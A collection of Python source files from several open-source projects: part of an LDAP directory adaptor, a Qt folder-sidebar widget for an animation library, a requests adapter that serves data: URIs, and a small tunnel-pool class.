{"dry_run_msg": self._dry_run_msg(),
"dn": dn, "attrs": str(mod_attrs)})
if self.is_dry_run():
return
try:
res = self._ldap.modify_s (dn, mod_attrs)
result_type, result_data = res[0], res[1]
if result_type != ldap.RES_MODIFY:
raise LdapAdaptorError(
"modify: unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def rename (self, dn, newrdn, newsuperior=None, delold=1):
"""
Perform a modify RDN operation.
"""
LOG.debug(
"%(dry_run)sModifying dn %(dn)s to %(newrdn)s%(newsuperior)s..." %
{"dry_run": self._dry_run_msg(),
"dn": dn, "newrdn": newrdn,
"newsuperior": newsuperior and "," + newsuperior or "" })
if self.is_dry_run():
return [True, None]
try:
res = self._ldap.rename_s(dn,
newrdn,
newsuperior,
delold)
result_type, result_data = res[0], res[1]
if result_type != ldap.RES_MODRDN:
raise LdapAdaptorError(
"rename: unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def search (self,
base_dn=None,
scope=ldap.SCOPE_SUBTREE,
filterstr='(objectClass=*)',
attrs=None,
page_size=1000):
"""
search([base_dn [, scope [, filterstr [, attrs [, page_size]]]]])
Search for entries
        Scope can be one of the following:
- SCOPE_BASE (to search the object itself);
- SCOPE_ONELEVEL (to search the object's immediate children);
- SCOPE_SUBTREE (to search the object and all its descendants).
Return list of results
"""
base_dn = base_dn or self._base_dn
LOG.debug(
"Searching for %(filter)s (%(attrs)s) on %(dn)s ..." %
{"filter": filterstr, "attrs": attrs, "dn": base_dn})
all_res = []
page_cookie = ''
while True:
# Use?
#filterstr = ldap.filter.escape_filter_chars(filterstr)
paging_ctrl = make_page_control(False, page_size, page_cookie)
query_id = self._ldap.search_ext(base_dn,
scope,
filterstr,
attrs,
serverctrls=[paging_ctrl])
x, res, y, ctrls = self._ldap.result3(query_id)
for dn, obj_attrs in res:
if dn is None:
continue
# Pesky attributes might be ranges, we need to see about that
new_ranges = get_new_ranges(obj_attrs)
while new_ranges:
new_res = self._ldap.search_s(dn,
ldap.SCOPE_BASE,
attrlist=new_ranges)
if len(new_res) != 1 or new_res[0][0] is None:
LOG.warn("get extra attr failed for {0}".format(dn))
break
new_attrs = new_res[0][1]
obj_attrs.update(new_attrs)
new_ranges = get_new_ranges(new_attrs)
all_res += res
# extract cookie if supplied by server
page_cookie = ''
for ext in ctrls:
if isinstance(ext, PagedCtrl):
x, page_cookie = get_page_control(ext)
if not page_cookie:
break #Paging not supported or end of paging
return all_res
@check_connected
def compare (self, dn, attr_name, attr_value):
"""
Return True if dn has attr_name with attr_value or False otherwise.
Verify in the directory server if the given DN has an attribute with
the given attribute name, and the given attribute value.
"""
LOG.debug(
"Verifying if %(dn)s has attribute %(attr_name)s=%(attr_val)s ..."
% {"dn": dn, "attr_name": attr_name, "attr_val": attr_value}
)
try:
return self._ldap.compare_s (dn, attr_name, attr_value)
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def passwd(self, dn, newpass, oldpass=None):
try:
self._ldap.passwd_s(dn, oldpass, newpass)
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
def get_error (self, e):
"""Try to identify error description from exception and return it."""
raise DeprecationWarning("get_error is deprecated")
def _set_verbose(self, v):
pass
def _get_verbose(self):
return True
verbose = property(fset=_set_verbose, fget=_get_verbose)
def _get_base_dn(self):
return self._base_dn
base_dn = property(fget=_get_base_dn)
def _get_connected(self):
return self._connected
def _set_connected(self, value):
self._connected = value
is_connected = property(fget=_get_connected, fset=_set_connected)
@property
def is_case_insensitive(self):
return self._case_insensitive_dn
def normalize_value(self, val):
if self.is_case_insensitive:
return val.lower()
else:
return val
def normalize_dn(self, dn):
attr = lambda name:name.lower()
handle_parts = lambda l: [
(attr(a), self.normalize_value(v), t) for a, v, t in l
]
return ldap.dn.dn2str(
handle_parts(part) for part in ldap.dn.str2dn(dn)
)
def compare_dn(self, dn, other):
# Normalize dn's to standard
return self.normalize_dn(dn) == self.normalize_dn(other)
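# A minimal usage sketch (illustrative server, DNs and credentials, not part of
# this module):
#   adaptor = LdapAdaptor("ldaps://ldap.example.com:636",
#                         base_dn="dc=example,dc=com",
#                         bind_user="cn=admin,dc=example,dc=com",
#                         bind_password="secret")
#   for dn, attrs in adaptor.search(filterstr="(uid=jdoe)", attrs=["mail"]):
#       adaptor.modify(dn, [(ldap.MOD_REPLACE, "mail", "jdoe@example.com")])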
|
veloutin/plow
|
plow/ldapadaptor.py
|
Python
|
lgpl-3.0
| 15,616
|
# Copyright 2020 by Kurt Rathjen. All Rights Reserved.
#
# This library is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. This library is distributed in the
# hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
import time
import logging
import functools
import collections
from studiovendor import six
from studiovendor.Qt import QtGui
from studiovendor.Qt import QtCore
from studiovendor.Qt import QtWidgets
import studioqt
import studiolibrary
import studiolibrary.widgets
from .sidebarwidgetitem import SidebarWidgetItem
__all__ = ["SidebarWidget"]
logger = logging.getLogger(__name__)
DEFAULT_SEPARATOR = "/"
def pathsToDict(paths, root="", separator=None):
"""
Return the given paths as a nested dict.
Example:
paths = ["/fruit/apple", "/fruit/orange"]
print pathsToDict(paths)
# Result: {"fruit" : {"apple":{}}, {"orange":{}}}
:type paths: list[str]
:type root: str
:type separator: str or None
:rtype: dict
"""
separator = separator or DEFAULT_SEPARATOR
results = collections.OrderedDict()
paths = studiolibrary.normPaths(paths)
for path in paths:
p = results
# This is to add support for grouping by the given root path.
if root and root in path:
path = path.replace(root, "")
p = p.setdefault(root, collections.OrderedDict())
        keys = path.split(separator)
for key in keys:
if key:
p = p.setdefault(key, collections.OrderedDict())
return results
def findRoot(paths, separator=None):
"""
Find the common path for the given paths.
Example:
paths = [
'/fruit/apple',
'/fruit/orange',
'/fruit/banana'
]
print(findRoot(paths))
# '/fruit'
:type paths: list[str]
:type separator: str
:rtype: str
"""
if paths:
path = list(paths)[0] # Only need one from the list to verify the common path.
else:
path = ""
result = None
separator = separator or DEFAULT_SEPARATOR
tokens = path.split(separator)
for i, token in enumerate(tokens):
root = separator.join(tokens[:i+1])
match = True
for path in paths:
if not path.startswith(root + separator):
match = False
break
if not match:
break
result = root
return result
class SidebarWidget(QtWidgets.QWidget):
itemDropped = QtCore.Signal(object)
itemRenamed = QtCore.Signal(str, str)
itemSelectionChanged = QtCore.Signal()
settingsMenuRequested = QtCore.Signal(object)
def __init__(self, *args):
super(SidebarWidget, self).__init__(*args)
self._dataset = None
self._lineEdit = None
self._previousFilterText = ""
layout = QtWidgets.QVBoxLayout(self)
layout.setSpacing(0)
layout.setContentsMargins(0,0,0,0)
self.setLayout(layout)
self._treeWidget = TreeWidget(self)
self._treeWidget.itemDropped = self.itemDropped
self._treeWidget.itemRenamed = self.itemRenamed
self._treeWidget.itemSelectionChanged.connect(self._itemSelectionChanged)
self._titleWidget = self.createTitleWidget()
self._titleWidget.ui.menuButton.clicked.connect(self.showSettingsMenu)
self._titleWidget.ui.titleButton.clicked.connect(self.clearSelection)
self.layout().addWidget(self._titleWidget)
self.layout().addWidget(self._treeWidget)
self._treeWidget.installEventFilter(self)
def _itemSelectionChanged(self, *args):
self.itemSelectionChanged.emit()
def eventFilter(self, obj, event):
"""Using an event filter to show the search widget on key press."""
if event.type() == QtCore.QEvent.KeyPress:
self._keyPressEvent(event)
return super(SidebarWidget, self).eventFilter(obj, event)
def _keyPressEvent(self, event):
"""
Triggered from the tree widget key press event.
:type event: QKeyEvent
"""
text = event.text().strip()
if not text.isalpha() and not text.isdigit():
return
if text and not self._titleWidget.ui.filterEdit.hasFocus():
self._titleWidget.ui.filterEdit.setText(text)
self.setFilterVisible(True)
self._previousFilterText = text
def _filterVisibleTrigger(self, visible):
"""
Triggered by the filter visible action.
:type visible: bool
"""
self.setFilterVisible(visible)
self._titleWidget.ui.filterEdit.selectAll()
def createTitleWidget(self):
"""
Create a new instance of the title bar widget.
:rtype: QtWidgets.QFrame
"""
class UI(object):
"""Proxy class for attaching ui widgets as properties."""
pass
titleWidget = QtWidgets.QFrame(self)
titleWidget.setObjectName("titleWidget")
titleWidget.ui = UI()
vlayout = QtWidgets.QVBoxLayout(self)
vlayout.setSpacing(0)
vlayout.setContentsMargins(0,0,0,0)
hlayout = QtWidgets.QHBoxLayout(self)
hlayout.setSpacing(0)
hlayout.setContentsMargins(0,0,0,0)
vlayout.addLayout(hlayout)
titleButton = QtWidgets.QPushButton(self)
titleButton.setText("Folders")
titleButton.setObjectName("titleButton")
titleWidget.ui.titleButton = titleButton
hlayout.addWidget(titleButton)
menuButton = QtWidgets.QPushButton(self)
menuButton.setText("...")
menuButton.setObjectName("menuButton")
titleWidget.ui.menuButton = menuButton
hlayout.addWidget(menuButton)
self._lineEdit = studiolibrary.widgets.LineEdit(self)
self._lineEdit.hide()
self._lineEdit.setObjectName("filterEdit")
self._lineEdit.setText(self.treeWidget().filterText())
self._lineEdit.textChanged.connect(self.searchChanged)
titleWidget.ui.filterEdit = self._lineEdit
vlayout.addWidget(self._lineEdit)
titleWidget.setLayout(vlayout)
return titleWidget
def _dataChanged(self):
pass
def setDataset(self, dataset):
"""
Set the dataset for the search widget:
:type dataset: studioqt.Dataset
"""
self._dataset = dataset
self._dataset.dataChanged.connect(self._dataChanged)
self._dataChanged()
def dataset(self):
"""
Get the dataset for the search widget.
:rtype: studioqt.Dataset
"""
return self._dataset
def search(self):
"""Run the dataset search."""
if self.dataset():
self.dataset().addQuery(self.query())
self.dataset().search()
else:
logger.info('No dataset found for the sidebar widget.')
def query(self):
"""
Get the query for the sidebar widget.
:rtype: dict
"""
filters = []
for path in self.selectedPaths():
if self.isRecursive():
suffix = "" if path.endswith("/") else "/"
filter_ = ('folder', 'startswith', path + suffix)
filters.append(filter_)
filter_ = ('folder', 'is', path)
filters.append(filter_)
uniqueName = 'sidebar_widget_' + str(id(self))
return {'name': uniqueName, 'operator': 'or', 'filters': filters}
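    # Example return value (illustrative), with the folder "/anim" selected and
    # recursion enabled:
    #   {'name': 'sidebar_widget_4399145232', 'operator': 'or',
    #    'filters': [('folder', 'startswith', '/anim/'), ('folder', 'is', '/anim')]}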
def searchChanged(self, text):
"""
Triggered when the search filter has changed.
:type text: str
"""
self.refreshFilter()
if text:
self.setFilterVisible(True)
else:
self.treeWidget().setFocus()
self.setFilterVisible(False)
def showSettingsMenu(self):
"""Create and show a new settings menu instance."""
menu = studioqt.Menu(self)
self.settingsMenuRequested.emit(menu)
self.createSettingsMenu(menu)
point = QtGui.QCursor.pos()
point.setX(point.x() + 3)
point.setY(point.y() + 3)
action = menu.exec_(point)
menu.close()
def createSettingsMenu(self, menu):
"""
Create a new settings menu instance.
:rtype: QMenu
"""
action = menu.addAction("Show Filter")
action.setCheckable(True)
action.setChecked(self.isFilterVisible())
callback = functools.partial(self._filterVisibleTrigger, not self.isFilterVisible())
action.triggered.connect(callback)
action = menu.addAction("Show Icons")
action.setCheckable(True)
action.setChecked(self.iconsVisible())
callback = functools.partial(self.setIconsVisible, not self.iconsVisible())
action.triggered.connect(callback)
action = menu.addAction("Show Root Folder")
action.setCheckable(True)
action.setChecked(self.isRootVisible())
callback = functools.partial(self.setRootVisible, not self.isRootVisible())
action.triggered.connect(callback)
return menu
def setFilterVisible(self, visible):
"""
Set the filter widget visible
:type visible: bool
"""
self._titleWidget.ui.filterEdit.setVisible(visible)
self._titleWidget.ui.filterEdit.setFocus()
if not visible and bool(self.treeWidget().filterText()):
self.treeWidget().setFilterText("")
else:
self.refreshFilter()
def setSettings(self, settings):
"""
Set the settings for the widget.
:type settings: dict
"""
self.treeWidget().setSettings(settings)
value = settings.get("filterVisible")
if value is not None:
self.setFilterVisible(value)
value = settings.get("filterText")
if value is not None:
self.setFilterText(value)
def settings(self):
"""
Get the settings for the widget.
:rtype: dict
"""
settings = self.treeWidget().settings()
settings["filterText"] = self.filterText()
settings["filterVisible"] = self.isFilterVisible()
return settings
# --------------------------------
# convenience methods
# --------------------------------
def filterText(self):
return self.treeWidget().filterText()
def setFilterText(self, text):
self._titleWidget.ui.filterEdit.setText(text)
def refreshFilter(self):
self.treeWidget().setFilterText(self._titleWidget.ui.filterEdit.text())
def isFilterVisible(self):
return bool(self.treeWidget().filterText()) or self._titleWidget.ui.filterEdit.isVisible()
def setIconsVisible(self, visible):
self.treeWidget().setIconsVisible(visible)
def iconsVisible(self):
return self.treeWidget().iconsVisible()
def setRootVisible(self, visible):
self.treeWidget().setRootVisible(visible)
def isRootVisible(self):
return self.treeWidget().isRootVisible()
def treeWidget(self):
return self._treeWidget
def setDpi(self, dpi):
self.treeWidget().setDpi(dpi)
def setRecursive(self, enabled):
self.treeWidget().setRecursive(enabled)
def isRecursive(self):
return self.treeWidget().isRecursive()
def setData(self, *args, **kwargs):
self.treeWidget().setData(*args, **kwargs)
def setItemData(self, id, data):
self.treeWidget().setPathSettings(id, data)
def setLocked(self, locked):
self.treeWidget().setLocked(locked)
def selectedPath(self):
return self.treeWidget().selectedPath()
def selectPaths(self, paths):
self.treeWidget().selectPaths(paths)
def selectedPaths(self):
return self.treeWidget().selectedPaths()
def clearSelection(self):
self.treeWidget().clearSelection()
class TreeWidget(QtWidgets.QTreeWidget):
itemDropped = QtCore.Signal(object)
itemRenamed = QtCore.Signal(str, str)
itemSelectionChanged = QtCore.Signal()
def __init__(self, *args):
super(TreeWidget, self).__init__(*args)
self._dpi = 1
self._data = []
self._items = []
self._index = {}
self._locked = False
self._dataset = None
self._recursive = True
self._filterText = ""
self._rootVisible = False
self._iconsVisible = True
self._options = {
'field': 'path',
'separator': '/',
'recursive': True,
'autoRootPath': True,
'rootText': 'FOLDERS',
'sortBy': None,
'queries': [{'filters': [('type', 'is', 'Folder')]}]
}
self.itemExpanded.connect(self.update)
self.itemCollapsed.connect(self.update)
self.setDpi(1)
self.setAcceptDrops(True)
self.setHeaderHidden(True)
self.setFrameShape(QtWidgets.QFrame.NoFrame)
self.setSelectionMode(QtWidgets.QTreeWidget.ExtendedSelection)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
def filterText(self):
"""
Get the current filter text.
        :rtype: str
"""
return self._filterText
def setFilterText(self, text):
"""
        Set the filter text and refresh the item filter.
:type text: str
"""
self._filterText = text.strip()
self.refreshFilter()
def refreshFilter(self):
"""Refresh the current item filter."""
items = self.items()
for item in items:
if self._filterText.lower() in item.text(0).lower():
item.setHidden(False)
for parent in item.parents():
parent.setHidden(False)
else:
item.setHidden(True)
def clear(self):
"""Clear all the items from the tree widget."""
self._items = []
self._index = {}
super(TreeWidget, self).clear()
def setRootVisible(self, visible):
"""
Set the root item visible.
:type visible: bool
"""
self._rootVisible = visible
self.refreshData()
def isRootVisible(self):
"""
Check if the root item is visible
:rtype: bool
"""
return self._rootVisible
def setIconsVisible(self, visible):
"""
Set all icons visible.
:type visible: bool
"""
self._iconsVisible = visible
self.refreshData()
def iconsVisible(self):
"""
Check if all the icons are visible.
:rtype: bool
"""
return self._iconsVisible
def selectionChanged(self, *args):
"""Triggered the current selection has changed."""
self.parent().search()
def setRecursive(self, enable):
"""
Set the search query on the dataset to be recursive.
:type enable: bool
"""
self._recursive = enable
self.parent().search()
def isRecursive(self):
"""
Get the recursive query enable state.
:rtype: bool
"""
return self._recursive
    def sortBy(self):
        """
        Get the sort-by fields.
        :rtype: list[str]
        """
        return self._options.get('sortBy') or [self.field()]
def field(self):
"""
Get the field.
:rtype: str
"""
return self._options.get('field', '')
def rootText(self):
"""
Get the root text.
:rtype: str
"""
return self._options.get('rootText')
def separator(self):
"""
Get the separator used in the fields to separate level values.
:rtype: str
"""
return self._options.get('separator', DEFAULT_SEPARATOR)
def _dataChanged(self):
"""Triggered when the data set has changed."""
pass
# data = collections.OrderedDict()
# queries = self._options.get("queries")
#
# items = self.dataset().findItems(queries)
#
# for item in items:
# itemData = item.itemData()
# value = itemData.get(self.field())
# data[value] = {'iconPath': itemData.get('iconPath')}
#
# if data:
# root = findRoot(data.keys(), separator=self.separator())
# self.setPaths(data, root=root)
def setLocked(self, locked):
"""
Set the widget items to read only mode.
:type locked: bool
:rtype: None
"""
self._locked = locked
def isLocked(self):
"""
Return True if the items are in read only mode
:rtype: bool
"""
return self._locked
def itemAt(self, pos):
"""
        :type pos: QtCore.QPoint
        :rtype: None or SidebarWidgetItem
"""
index = self.indexAt(pos)
if not index.isValid():
return
item = self.itemFromIndex(index)
return item
def dropEvent(self, event):
"""
:type event: QtCore.QEvent
:rtype: None
"""
if self.isLocked():
logger.debug("Folder is locked! Cannot accept drop!")
return
self.itemDropped.emit(event)
def dragMoveEvent(self, event):
"""
:type event: QtCore.QEvent
:rtype: None
"""
mimeData = event.mimeData()
if mimeData.hasUrls():
event.accept()
else:
event.ignore()
item = self.itemAt(event.pos())
if item:
self.selectPaths([item.path()])
def dragEnterEvent(self, event):
"""
:type event: QtCore.QEvent
:rtype: None
"""
event.accept()
def selectItem(self, item):
"""
:type item: NavigationWidgetItem
:rtype: None
"""
self.selectPaths([item.path()])
def dpi(self):
"""
Return the dots per inch multiplier.
:rtype: float
"""
return self._dpi
def setDpi(self, dpi):
"""
Set the dots per inch multiplier.
:type dpi: float
:rtype: None
"""
self._dpi = dpi
width = 20 * dpi
height = 18 * dpi
self.setIndentation(9 * dpi)
self.setMinimumWidth(20 * dpi)
self.setIconSize(QtCore.QSize(width, height))
self.setStyleSheet("height: {height}px;".format(height=height))
def update(self, *args):
"""
:rtype: None
"""
for item in self.items():
item.update()
def items(self):
"""
Return a list of all the items in the tree widget.
:rtype: list[NavigationWidgetItem]
"""
items = self.findItems(
"*",
QtCore.Qt.MatchWildcard | QtCore.Qt.MatchRecursive
)
return items
def itemFromUrl(self, url):
"""
Return the item for the given url.
:type url: QtCore.QUrl
:rtype: NavigationWidgetItem
"""
for item in self.items():
if url == item.url():
return item
def itemFromPath(self, path):
"""
Return the item for the given path.
:type path: str
:rtype: NavigationWidgetItem
"""
return self._index.get(path)
def settings(self):
"""
Return a dictionary of the settings for this widget.
:rtype: dict
"""
settings = {}
scrollBar = self.verticalScrollBar()
settings["verticalScrollBar"] = {
"value": scrollBar.value()
}
scrollBar = self.horizontalScrollBar()
settings["horizontalScrollBar"] = {
"value": scrollBar.value()
}
for item in self.items():
itemSettings = item.settings()
if itemSettings:
settings[item.path()] = item.settings()
return settings
def setSettings(self, settings):
"""
Set the settings for this widget
:type settings: dict
"""
for path in sorted(settings.keys()):
s = settings.get(path, None)
self.setPathSettings(path, s)
scrollBarSettings = settings.get("verticalScrollBar", {})
value = scrollBarSettings.get("value")
if value:
self.verticalScrollBar().setValue(value)
scrollBarSettings = settings.get("horizontalScrollBar", {})
value = scrollBarSettings.get("value")
if value:
self.horizontalScrollBar().setValue(value)
self.setDpi(self.dpi())
def setPathSettings(self, path, settings):
"""
        Set the settings for the item with the given path.
:type path: str
:type settings: dict
:rtype: None
"""
item = self.itemFromPath(path)
if item and settings:
item.setSettings(settings)
def showContextMenu(self, position):
"""
Show the context menu at the given position.
:type position: QtCore.QPoint
:rtype: None
"""
menu = self.createContextMenu()
menu.exec_(self.viewport().mapToGlobal(position))
def expandedItems(self):
"""
Return all the expanded items.
:rtype: list[NavigationWidgetItem]
"""
for item in self.items():
            if item.isExpanded():
yield item
def expandedPaths(self):
"""
Return all the expanded paths.
        :rtype: list[str]
"""
for item in self.expandedItems():
yield item.url()
def setExpandedPaths(self, paths):
"""
Set the given paths to expanded.
:type paths: list[str]
"""
for item in self.items():
if item.url() in paths:
item.setExpanded(True)
def selectedItem(self):
"""
Return the last selected item
:rtype: SidebarWidgetItem
"""
path = self.selectedPath()
return self.itemFromPath(path)
def selectedPath(self):
"""
Return the last selected path
:rtype: str or None
"""
paths = self.selectedPaths()
if paths:
return paths[-1]
def selectedPaths(self):
"""
Return the paths that are selected.
:rtype: list[str]
"""
paths = []
items = self.selectedItems()
for item in items:
path = item.path()
paths.append(path)
return studiolibrary.normPaths(paths)
def selectPath(self, path):
"""
Select the given path
:type: str
:rtype: None
"""
self.selectPaths([path])
def selectPaths(self, paths):
"""
Select the items with the given paths.
:type paths: list[str]
:rtype: None
"""
paths = studiolibrary.normPaths(paths)
items = self.items()
for item in items:
if studiolibrary.normPath(item.path()) in paths:
item.setSelected(True)
else:
item.setSelected(False)
def selectUrl(self, url):
"""
Select the item with the given url.
:type url: str
:rtype: None
"""
items = self.items()
for item in items:
if item.url() == url:
item.setSelected(True)
else:
item.setSelected(False)
def selectedUrls(self):
"""
Return the urls for the selected items.
:rtype: list[str]
"""
urls = []
items = self.selectedItems()
for item in items:
urls.append(item.url())
return urls
def setPaths(self, *args, **kwargs):
"""
This method has been deprecated.
"""
logger.warning("This method has been deprecated!")
self.setData(*args, **kwargs)
def refreshData(self):
self.setData(self._data)
def setData(self, data, root="", split=None):
"""
Set the items to the given items.
:type data: list[str]
:type root: str
:type split: str
:rtype: None
"""
self._data = data
settings = self.settings()
self.blockSignals(True)
self.clear()
if not root:
root = findRoot(data.keys(), self.separator())
self.addPaths(data, root=root, split=split)
self.setSettings(settings)
self.blockSignals(False)
self.parent().search()
def addPaths(self, paths, root="", split=None):
"""
Set the given items as a flat list.
:type paths: list[str]
:type root: str or None
:type split: str or None
"""
data = pathsToDict(paths, root=root, separator=split)
self.createItems(data, split=split)
if isinstance(paths, dict):
self.setSettings(paths)
def createItems(self, data, split=None):
"""
Create the items from the given data dict
:type data: dict
:type split: str or None
:rtype: None
"""
split = split or DEFAULT_SEPARATOR
self._index = {}
for key in data:
            root = key
item = None
if self.isRootVisible():
text = key.split(split)
if text:
text = text[-1]
else:
text = key
item = SidebarWidgetItem(self)
item.setText(0, six.text_type(text))
item.setPath(root)
item.setExpanded(True)
self._index[root] = item
def _recursive(parent, children, split=None, root=""):
for text, val in sorted(children.items()):
if not parent:
parent = self
path = split.join([root, text])
path = studiolibrary.normPath(path)
child = SidebarWidgetItem(parent)
child.setText(0, six.text_type(text))
child.setPath(path)
self._index[path] = child
_recursive(child, val, split=split, root=path)
_recursive(item, data[key], split=split, root=root)
self.update()
self.refreshFilter()
class ExampleWindow(QtWidgets.QWidget):
def __init__(self, *args):
QtWidgets.QWidget.__init__(self, *args)
layout = QtWidgets.QVBoxLayout(self)
self.setLayout(layout)
self._lineEdit = QtWidgets.QLineEdit()
self._lineEdit.textChanged.connect(self.searchChanged)
self._treeWidget = TreeWidget(self)
self._slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self._slider.valueChanged.connect(self._valueChanged)
self._slider.setRange(50, 200)
self._slider.setValue(100)
self._slider.setFixedHeight(18)
layout.addWidget(self._slider)
layout.addWidget(self._lineEdit)
layout.addWidget(self._treeWidget)
self._treeWidget.itemClicked.connect(self.itemClicked)
self._treeWidget.itemSelectionChanged.connect(self.selectionChanged)
self.update()
def _valueChanged(self, value):
self.update()
def update(self):
import studiolibrary
value = self._slider.value()
value = value / 100.0
theme = studiolibrary.widgets.Theme()
theme.setDpi(value)
self._treeWidget.setDpi(value)
self._treeWidget.setStyleSheet(theme.styleSheet())
def setData(self, *args, **kwargs):
self._treeWidget.setData(*args, **kwargs)
def itemClicked(self):
print("ITEM CLICKED")
print(self._treeWidget.settings())
items = self._treeWidget.selectedItems()
for item in items:
print(item.path())
def selectionChanged(self, *args):
print("SELECTION CHANGED", args)
def searchChanged(self, text):
print("SEARCH CHANGED", text)
items = self._treeWidget.items()
t = time.time()
self._treeWidget.expandAll()
for item in items:
if text.lower() in item.text(0).lower():
item.setHidden(False)
for parent in item.parents():
parent.setHidden(False)
else:
item.setHidden(True)
print(time.time() - t)
def runTests():
paths = [
'/fruit/apple',
'/fruit/orange',
'/fruit/banana'
]
assert findRoot(paths) == '/fruit'
paths = [
'/fruit/apple',
'/fruit/orange',
'/fruit/banana',
'/tesla/cars'
]
assert findRoot(paths) == ''
data = pathsToDict(paths)
assert 'fruit' in data
assert 'apple' in data.get('fruit')
assert 'orange' in data.get('fruit')
assert 'banana' in data.get('fruit')
assert 'cars' in data.get('tesla')
paths = [
'>tesla>car>modelS',
'>tesla>car>modelX',
'>tesla>car>model3',
]
assert findRoot(paths, separator='>') == '>tesla>car'
data = pathsToDict(paths, separator='>')
assert 'tesla' in data
assert 'modelS' in data.get('tesla').get('car')
assert 'modelX' in data.get('tesla').get('car')
assert 'model3' in data.get('tesla').get('car')
def showExampleWindow():
data = {
"P:/production/shared/anim": {
"text": "FOLDERS",
"bold": True,
"isExpanded": True,
"iconPath": "none",
"iconColor": "rgb(100, 100, 150)",
"textColor": "rgb(100, 100, 150, 150)"
},
"P:/production/shared/anim/walks/fast.anim": {},
"P:/production/shared/anim/walks/slow.anim": {},
"P:/production/shared/anim/rigs/prop.rig": {},
"P:/production/shared/anim/rigs/character.rig": {},
"Users/libraries/animation/Character/Boris/stressed.pose": {},
"Users/libraries/animation/Character/Boris/smile.pose": {},
"Users/libraries/animation/Character/Cornilous/normal.pose": {},
"Users/libraries/animation/Character/Cornilous/relaxed.pose": {},
"Users/libraries/animation/Character/Cornilous/surprised.pose": {},
"Users/libraries/animation/Character/Figaro/test.anim": {},
"Users/libraries/animation/Character/Figaro/anim/hiccup.anim": {},
"props/car/color/red": {},
"props/car/color/orange": {},
"props/car/color/yellow": {},
"props/plane/color/blue": {},
"props/plane/color/green": {},
"/": {},
"/Hello": {},
"/Hello/World": {},
"/Test/World": {},
"tags": {
"text": "TAGS",
"bold": True,
"isExpanded": True,
"iconPath": "none",
"iconColor": "rgb(100, 100, 150)",
"textColor": "rgb(100, 100, 150, 150)"
},
"tags/red": {
"iconColor": "rgb(200, 50, 50)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/orange": {
"bold": True,
"textColor": "rgb(250, 150, 50)",
"iconColor": "rgb(250, 150, 50)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/yellow": {
"iconColor": "rgb(250, 200, 0)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/blue": {
"iconColor": "rgb(50, 150, 250)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/green": {
"iconColor": "rgb(100, 200, 0)",
"iconPath": "../../resource/icons/circle.png"
}
}
window = ExampleWindow(None)
window.setData(data)
window.show()
window.setGeometry(300, 300, 300, 600)
return window
if __name__ == "__main__":
with studioqt.app():
w = showExampleWindow()
|
krathjen/studiolibrary
|
src/studiolibrary/widgets/sidebarwidget/sidebarwidget.py
|
Python
|
lgpl-3.0
| 32,909
|
from email.utils import formatdate
from traceback import format_exc
from urllib import unquote as url_unquote
from requests import Response
from requests.adapters import BaseAdapter
from requests.exceptions import RequestException, InvalidURL
from requests.hooks import dispatch_hook
from binascii import a2b_base64
from StringIO import StringIO
class UnsupportedFeature(RequestException):
"""Adapter doesn't support this feature."""
class DataAdapter(BaseAdapter):
"""adapter for Data URIs"""
def send(self, request, stream=False, verify=None, cert=None, proxies=None,
timeout=None):
"""issue request"""
data = url_unquote(request.url[len('data:'):])
if ',' not in data:
raise InvalidURL('data URL missing comma')
mime, content = data.split(',', 1)
content = content.strip()
base64 = False
charset = None
while ';' in mime:
mime, encoding_spec = mime.rsplit(';', 1)
encoding_spec = encoding_spec.strip()
if encoding_spec == 'base64':
base64 = True
elif not encoding_spec.startswith('charset='):
raise InvalidURL(
'unrecognized encoding parameter: %r' % encoding_spec
)
else:
charset = encoding_spec[len('charset='):]
        # build the Response before decoding so the except-branch below can
        # never hit an unbound name if base64 decoding fails
        response = Response()
        response.url = request.url
        response.headers['Date'] = formatdate(timeval=None, localtime=True)
        try:
            if base64:
                content = a2b_base64(content)
            content_type = mime.strip()
            if charset:
                content_type += "; charset=" + charset
            if request.method in ('GET', 'HEAD'):
                response.status_code = 200
                response.headers['Content-Length'] = len(content)
                response.headers['Last-Modified'] = formatdate()
                response.headers['Content-Type'] = content_type
                if charset:
                    response.encoding = charset
                response.raw = StringIO(str(content))
            else:
                response.status_code = 405
                response.headers['Status'] = '405 Method Not Allowed'
        except Exception:
            response.status_code = 500
            response.headers['Status'] = '500 Internal Server Error'
            response.raw = StringIO(format_exc())
# context
response.request = request
response.connection = self
# hooks
response = dispatch_hook('response', request.hooks, response)
# streaming
if not stream:
response.content
return response
def close(self):
"""close connection (currently doesn't do anything)"""
|
jvantuyl/requests-data
|
requests_data/adapters.py
|
Python
|
lgpl-3.0
| 2,822
|
class tunel:
def __init__(self, tn_id, name=None, cnt=0):
self.tn_id = tn_id
if name:
self.name = name
else:
self.name = 'tunel '+str(tn_id)[1:]
self.cnt = cnt
class tunel_pool:
def __init__(self):
self.pool = {}
self.pool['t0'] = tunel('t0', 'main tunel', 1)
def join_tn(self, tn_id):
self.pool.setdefault(tn_id, tunel(tn_id=tn_id, cnt=0))
self.pool[tn_id].cnt += 1
return tn_id
def leave_tn(self, tn_id):
if tn_id in self.pool:
self.pool[tn_id].cnt -= 1
if not self.pool[tn_id].cnt:
self.pool.pop(tn_id)
def ch_tn(self, tn_id_from, tn_id_to):
self.join_tn(tn_id_to)
self.leave_tn(tn_id_from)
return tn_id_to
    def chname_tn(self, tn_id, new_name):
        if tn_id == 't0' or tn_id not in self.pool:
            return False
        self.pool[tn_id].name = new_name
        return True
